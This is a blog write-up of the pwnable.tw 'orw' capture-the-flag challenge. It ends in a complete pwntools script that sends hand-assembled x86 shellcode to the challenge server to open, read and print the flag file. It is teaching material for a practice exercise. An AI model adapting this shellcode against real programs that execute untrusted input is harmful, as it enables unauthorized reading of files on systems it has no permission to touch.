Open in app

Sign in

Write

Sign in

Orw [pwnable.tw] (part 2)

tourpran
ZH3R0
Published in
3 min readApr 29, 2020

Hey guys, this is a pretty awesome challenge !! Here we will be writing assembly and then we will give it to the program(binary)

I have tried my best to explain the challenge. Hope you like it !!
A quick note if you have not seen my previous blog please do check it out.

Start [pwnable.tw] (part 1)

Hey guys, I have tried my best to explain the challenge. Hope you love it !!

medium.com

Solution:

First I check the mitigations :

We have NX disabled. That means it is something to do with the shellcode.

Let's see the disassembly of this program

Here we can see that our input is being put in the address 0x804a060
and then it is moved to EAX and then after that EAX is called

Meaning: our input is being executed.

Now, let us run the binary and see what is happening :>

Hmm… We get a segfault.

Our idea :

  • As said in the question we will you three syscalls and then get the flag
  • First call: open the flag file
  • Second call: read the file
  • Third call: write it to the output

Exploit:

We will see the exploit in parts.

Part 1:

  • We make EAX to 5
  • we push the string “///home/orw/flag”
  • We make EBX pointing to the stack ( the string )
  • We make EDX equal to 0 and then we make the syscall.

Part 2:

  • We make EAX equal to 3
  • We make ECX point to the string
  • Give EDX the buffer size
  • Call the syscall

Part 3:

  • We make EAX equal to 4
  • Make EBX equal to 0
  • Add 1 to EBX / making EBX equal to 1. Then call the syscall.

Refer to the below image if having any doubts !!

If we put all of the things together, then we get the flag.

# our final scriptfrom pwn import *p = remote('chall.pwnable.tw',10001)
print p.recv()s = asm("xor eax, eax")
s += asm("push eax")
s += asm("add eax, 5")
s += asm("push 0x67616c66")
s += asm("push 0x2f77726f")
s += asm("push 0x2f656d6f")
s += asm("push 0x682f2f2f")
s += asm("mov ebx, esp")
s += asm("mov edx, 0")
s += asm("int 0x80")s += asm("mov eax, 3")
s += asm("mov ecx, ebx")
s += asm("mov ebx, 3")
s += asm("mov edx, 40")
s += asm("int 0x80")s += asm("mov eax, 4")
s += asm("mov ebx, 0")
s += asm("inc ebx")
s += asm("int 0x80")p.send(s)
f = p.recv()
print f
p.interactive()

I hope you liked the write-up. More writeups on its way.

Pwnabletw
Ctf
Writeup

--

--

tourpran
ZH3R0

Written by tourpran

13 Followers
Writer for

__ I am just a high school kid with an appetite for success __

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams